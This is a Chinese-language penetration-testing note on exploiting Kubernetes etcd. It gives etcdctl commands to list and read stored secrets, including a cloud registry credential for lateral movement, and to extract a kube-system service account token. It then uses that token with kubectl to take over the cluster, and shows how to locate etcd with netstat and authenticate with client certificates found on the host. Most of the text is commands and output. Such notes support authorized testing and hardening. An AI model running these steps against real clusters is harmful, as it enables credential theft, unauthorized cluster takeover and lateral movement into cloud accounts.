K8s渗透测试etcd的利用
[Penetration Testing]
ETCD
etcd:k-v数据库,用于保存K8s集群数据,在配置错误/搭配SSRF利用时,访问到etcd=接管集群。位于K8s master node 对内暴露2379端口,本地127.1可免认证访问,其他地址要带--endpoint
参数和cert进行认证。
文档
- https://kubernetes.io/zh/docs/concepts/overview/components/
- https://etcd.io/docs/
未授权访问的情况
ETCD V2和V3是两套不兼容的API,K8s用V3,通过环境变量设置API V3:
export ETCDCTL_API=3
检查是否正常连接
etcdctl endpoint health
127.0.0.1:2379 is healthy: successfully committed proposal: took = 939.097µs
查看K8s secrets
etcdctl get / --prefix --keys-only | grep /secrets/
获取集群中保存的云产品AK,横向移动:
etcdctl get /registry/secrets/default/acr-credential-518dfd1883737c2a6bde99ed6fee583c
读取service account token
etcdctl get / --prefix --keys-only | grep /secrets/kube-system/clusterrole
在返回值末尾取 ey
开始到#kubernetes.io/service-account-token
末尾#
之前的这部分:
通过token认证访问API-Server,接管集群:
kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods
需要认证的情况
尝试读取etcd数据
etcdctl get / --prefix --keys-only
Error: dial tcp 127.0.0.1:2379: getsockopt: connection refused
结果返回本地2379连接失败,netstat看下发现监听的是172段,这种情况下需要指定endpoint带cert进行访问,认证失败会返回Error: context deadline exceeded
。
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# netstat -antp | grep LISTEN
tcp 0 0 127.0.0.1:10248 0.0.0.0:* LISTEN 2917/kubelet
tcp 0 0 127.0.0.1:10249 0.0.0.0:* LISTEN 4801/kube-proxy
tcp 0 0 172.16.0.112:2379 0.0.0.0:* LISTEN 3222/etcd
tcp 0 0 172.16.0.112:2380 0.0.0.0:* LISTEN 3222/etcd
tcp 0 0 127.0.0.1:10253 0.0.0.0:* LISTEN 4628/cloud-controll
tcp 0 0 127.0.0.1:10257 0.0.0.0:* LISTEN 4134/kube-controlle
tcp 0 0 127.0.0.1:10259 0.0.0.0:* LISTEN 4150/kube-scheduler
tcp 0 0 127.0.0.1:33941 0.0.0.0:* LISTEN 2917/kubelet
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3465/sshd
带cert访问etcd
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# ls
172.16.0.112-name-1.csr 172.16.0.114-name-3.csr ca.pem etcd-server.pem
172.16.0.112-name-1-key.pem 172.16.0.114-name-3-key.pem etcd-client.csr peer-ca-config.json
172.16.0.112-name-1.pem 172.16.0.114-name-3.pem etcd-client-key.pem peer-ca.csr
172.16.0.113-name-2.csr ca-config.json etcd-client.pem peer-ca-key.pem
172.16.0.113-name-2-key.pem ca.csr etcd-server.csr peer-ca.pem
172.16.0.113-name-2.pem ca-key.pem etcd-server-key.pem
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health
https://172.16.0.112:2379 is healthy: successfully committed proposal: took = 2.084526ms